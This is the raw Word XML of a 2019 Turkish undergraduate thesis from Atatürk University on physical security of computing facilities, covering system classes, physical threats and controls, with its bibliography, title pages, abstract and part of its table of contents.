      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bilgisayarın bağlı olduğu diğer kaynaklar (dosya sunucuları, ana bilgisayarlar ve e-posta dahil).</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D72E8A"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9.1. Bilgi Sistemleri Sınıflandırılmas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 üç tipe ayrılabil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 Sunucular / ana bilgisayarlar: Genellikle fiziksel olarak en güvenli sistemler sınıfı. Bu ortak kaynaklanmaktad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unları bir çeşit erişim ve çevre kontrolü olan bir yere yerleşti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rme uygulaması. olmasına rağmen. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu sınıf en fiziksel olarak güvenli olabilir, genel güvenliği fizi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ksel güvenliğe bağlıdır. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İş istasyonlarının ve bunlara erişen taşınabilir cihazların list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2. İş İstasyonları: Genellikle bir tesisin daha açık veya erişilebilir alanlarına yerleştirili</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">r. Kullanılabilirliği nedeniyle </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>iş yerinde, iş istasyonları dikkatsizce kullanılırsa fiziksel güvenlik sorunlarına eğilimli olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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3. Taşınabilir cihazlar: Bir kuruluşun güvenlik kabusu olabilir. Diz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">üstü ve PDA ihraç etmeme rağmen </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çalışanlar bir kuruluşta esneklik ve üretkenliği kolaylaştırır, bununla birlikte birkaç ci</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ddi risk oluşturur </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fiziksel güvenlik ile ilgili olarak. Şirketin dahili bilgi s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">istemlerine erişen kullanıcılar </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>herhangi bir yerde, bu cihazlardan birinin fiziksel güvenliğin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in ihlal edilmesi bir kuruluşun bilgi güvenliğine zarar verir</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Bu sınıfa çok özen gösterilmelidir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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9.2. Bilgi Sistemleri Fiziksel Tehditler ve Kontroller ve Farkındalık Eğitim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nin sınıflandırılması, hangi tehditlerin hangi sistemler için daha büyük bir risk oluşturduğunun b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">elirlenmesine yardımcı olur. Bu </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kontrolleri uygulamak için bir rehber sağlar. Muhtemelen en büy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ük bilgi sistemleri için tehdit </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kullanıcı. Herhangi bir kullanıcı, fiziksel olarak bilgisayarlarını korumada gerekli özen göstermediği</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> takdirde aklınızda bulundurun.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Varlıklar, hemen hemen tüm kontroller etkisiz hale gelir ve cihazı savunmasız bırakır. Bu bölüm, ana hat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Bilgi sistemleri için temel tehdit ve kontrol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ayıp / hırsızlık / imha aşağıdaki riskleri taşı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Verimlilik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ayıp / hırsızlık / imha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lar için fiziksel kilit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ları işaretleme ve etiketleme</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nin kullanımını en aza indirin</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depolama için şifreleme</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için veri sınıflandırma ve teslim prosedür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arkındalık eğitim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Pr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CC TV'ler</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</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larm sistem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zinsiz erişim aşağıdaki riskleri doğuru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kurcalama</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ötü amaçlı yazılım</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zinsiz giriş kontrolleri şunları içeri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litleme konsol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İyi şifre uygulamalar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arkındalık eğitim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için veri sınıflandırma ve teslim prosedürler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CC TV’ler)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D72E8A"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depolama için şifreleme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00287391" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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çlü kimlik doğrulama ve erişim kontrolleri</w:t>
      </w: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tabs>
          <w:tab w:val="left" w:pos="2700"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00287391" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
        </w:tabs>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YNAKÇA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1. Fennelly, Lawrence J. et al., Effective Physical Security, Second Edition, Butterworth-Heinemann, 1997.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 2. Fites, P. and Kratz, M.P.J., Information Systems Security: A Practitioner’s Reference, International Thomson Computer Press, 1996. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Tipton, Harold and Krause, Micki, Eds., Information Security Management Handbook, 4th edition, Auerbach Publications, 2000. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Department of Education, National Center for Education Statistics, Protecting Your System: Physical Security (online), 1998. Available from World </w:t>
      </w:r>
      <w:hyperlink r:id="rId169" w:history="1">
        <w:r w:rsidRPr="00D7241D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://nces.ed.gov/pubs98/safetech/chapter5.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Tipton, Harold and Krause, Micki, Eds., Information Security Management Handbook, Auberbach Publications, 1999. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="001E2328" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2700"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>6. Linux Documentation Project, Security How-To: Physical Security (online). Available http://www.linuxdoc.org/HOWTO/Security-HOWTO-3.html.</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">T.C. ATATÜRK ÜNİVERSİTESİ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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MÜHENDİSLİK FAKÜLTESİ</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PHYSİCAL SECURİTY: CONTROLLED ACCESS AND LAYEREDDEFENSE</w:t>
      </w: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COMPUTİNG FACİLİTY PHYSİCAL SECURİTY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Section: 10.1.2-10.1.3</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HABİBE AKSAKAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>150707025</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LİSANS BİLGİSAYAR MÜHENDİSLİĞİ</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2019</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 xml:space="preserve">T.C. ATATÜRK ÜNİVERSİTESİ </w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>MÜHENDİSLİK FAKÜLTESİ</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D753D9"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FİZİKSEL GÜVENLİK: KONTUROLLÜ ERİŞİM VEKATMANLI SAVUNMA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D753D9"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BİLGİ İŞLEM TESİSİ FİZİKSEL GÜVENLİK</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HABİBE AKSAKAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>150707025</w:t>
      </w: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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LİSANS BİLGİSAYAR MÜHENDİSLİĞİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="3540"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2019</w:t>
      </w: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ÖZET</w:t>
      </w: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D753D9"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tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>FİZİKSEL GÜVENLİK: KONTUROLLÜ ERİŞİM VEKATMANLI SAVUNMA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D753D9"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tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>BİLGİ İŞLEM TESİSİ FİZİKSEL GÜVENLİK</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>Habibe AKSAKAL</w:t>
      </w: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Lisans Tezi, Bilgisayar Mühendisliği Danışman: Prof. Dr. Abdulsamet HAŞILOĞLU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008604A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mayıs 2019,  15 Sayfa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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Bilgisayar Mühendisliği alanındaki teknolojik gelişmeler bilgi sistemleri üzerinde işlenen ve paylaşılan bilginin boyutunu hızla artırmaktadır. Kamu kurum ve kuruluşları bu gelişmeleri takip ederek bilgi sistemleri sayılarını arttırmakta, temel görevlerini diğer kamu kurum ve kuruluşları ile bilgi paylaşım esasına göre bu sistemlerin üzerinde sürdürmekte ve vatandaşlara sunmaktadır. Özel sektörde de durum pek farklı değildir. Internet bankacılığı ile başlayan hizmetler bankacılık dışında hizmet veren firmaların artması ve güçlenmesi ile internet üzerinden her gün daha fazla kişi tarafından kullanılmaktadır. Bu nedenle bilgi sistemleri üzerindeki bilginin güvenliği ve hizmetlere erişilebilirlik bu hizmetleri veren kamu ve özel kurum ve kuruluşları için önem verilmesi gereken bir konu olmaktadır. Bu çalışmanın amacı bilgi sistemleri güvenliği kavramının araştırılarak sınırlarının tanımlanması ve mantıksal güvenlik alanında yararlı olabilecek güvenlik yazılımlarının kurum ve kuruluşlar tarafından nasıl kullanılabileceğinin özetlenmesidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="212121"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="212121"/>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Default="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008604A3" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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C393C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>İÇİNDEKİNLE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E77DF4" w:rsidRPr="00BC393C" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc9949859" w:history="1">
        <w:r w:rsidRPr="00BC393C">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>1. GİRİŞ</w:t>
        </w:r>
        <w:r w:rsidRPr="00BC393C">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00BC393C">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00BC393C">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949859 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00BC393C">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00BC393C">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidRPr="00BC393C">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidRPr="00BC393C">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949860" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>2.FİZİKSEL GÜVENLİK (Physical Security)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949860 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949861" w:history="1">
        <w:r w:rsidRPr="007038EF">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          </w:rPr>
          <w:t>3.GÜVENLİK: KONTROLLÜ ERİŞİM</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc9949861 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="T1"/>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc9949862" w:history="1">
